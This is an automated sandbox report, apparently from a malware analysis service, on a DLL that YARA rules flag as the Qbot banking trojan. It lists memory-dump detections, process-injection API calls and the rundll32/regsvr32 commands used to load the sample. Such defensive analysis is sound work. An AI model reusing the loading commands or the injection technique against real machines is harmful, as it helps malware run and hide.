          Source: 8.0.wermgr.exe.12a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.4450000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.4450000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.3.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.3.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.2.wermgr.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.2.wermgr.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.2.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.2.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.0.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.0.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.0.wermgr.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.0.wermgr.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.3.rundll32.exe.2d60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.3.rundll32.exe.2d60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.3.rundll32.exe.4430000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.3.rundll32.exe.4430000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.2.rundll32.exe.2ee0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.2.rundll32.exe.2ee0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.2.regsvr32.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.regsvr32.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.2.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.2.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.3.rundll32.exe.2d60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.3.rundll32.exe.2d60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 8.0.wermgr.exe.12a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 8.0.wermgr.exe.12a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_009A29E93_2_009A29E9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_009A35EE3_2_009A35EE
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_009A82A03_2_009A82A0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_009A63B03_2_009A63B0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_009A676F3_2_009A676F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_044635EE4_2_044635EE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_044629E94_2_044629E9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_044682A04_2_044682A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0446676F4_2_0446676F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_044663B04_2_044663B0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0099D9DE GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,3_2_0099D9DE
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0099D538 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,3_2_0099D538
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0445D538 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,4_2_0445D538
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0445D9DE GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,4_2_0445D9DE
          Source: pebbles.dat.dll.8.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: pebbles.dat.dll.8.drStatic PE information: Data appended to the last section found
          Source: pebbles.dat.dllReversingLabs: Detection: 16%
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll"
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer
